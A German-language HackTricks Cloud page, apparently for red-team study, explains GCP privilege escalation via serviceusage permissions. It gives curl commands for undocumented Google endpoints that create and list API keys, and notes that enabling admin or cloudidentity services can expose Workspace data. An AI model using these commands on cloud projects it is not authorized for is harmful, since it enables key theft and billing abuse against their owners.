GCP - Serviceusage Privesc

Lernen Sie und üben Sie AWS-Hacking: HackTricks Training AWS Red Team Expert (ARTE) Lernen Sie und üben Sie GCP-Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories senden.

serviceusage

Die folgenden Berechtigungen sind nützlich, um API-Schlüssel zu erstellen und zu stehlen, nicht wie in den Dokumenten beschrieben: Ein API-Schlüssel ist ein einfacher verschlüsselter String, der eine Anwendung ohne jeglichen Prinzipal identifiziert. Sie sind nützlich, um öffentliche Daten anonym abzurufen, und werden verwendet, um API-Anfragen mit Ihrem Projekt zur Quoten- und Abrechnungs-Zuordnung zu verknüpfen.

Daher können Sie mit einem API-Schlüssel bewirken, dass das Unternehmen für Ihre Nutzung der API bezahlt, aber Sie können keine Berechtigungen eskalieren.

Um weitere Berechtigungen und Möglichkeiten zur Generierung von API-Schlüsseln zu erfahren, überprüfen Sie:

GCP - Apikeys Privesc

`serviceusage.apiKeys.create`

Es wurde eine nicht dokumentierte API gefunden, die verwendet werden kann, um API-Schlüssel zu erstellen:

curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"

`serviceusage.apiKeys.list`

Ein weiteres nicht dokumentiertes API wurde gefunden, um API-Schlüssel aufzulisten, die bereits erstellt wurden (die API-Schlüssel erscheinen in der Antwort):

curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"

`serviceusage.services.enable` , `serviceusage.services.use`

Mit diesen Berechtigungen kann ein Angreifer neue Dienste im Projekt aktivieren und nutzen. Dies könnte einem Angreifer ermöglichen, Dienste wie admin oder cloudidentity zu aktivieren, um auf Workspace-Informationen zuzugreifen, oder andere Dienste, um auf interessante Daten zuzugreifen.

Referenzen

https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/

Unterstützen Sie HackTricks und erhalten Sie Vorteile!

Arbeiten Sie in einem Cybersicherheitsunternehmen? Möchten Sie Ihr Unternehmen in HackTricks beworben sehen? Oder möchten Sie Zugang zur neuesten Version des PEASS erhalten oder HackTricks im PDF-Format herunterladen? Überprüfen Sie die ABONNEMENTPLÄNE!

Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs

Holen Sie sich das offizielle PEASS & HackTricks-Merch

Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie mir auf Twitter 🐦@carlospolopm.

Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das HackTricks-GitHub-Repo****

PreviousGCP - Secretmanager Privesc NextGCP - Sourcerepos Privesc

Last updated 1 month ago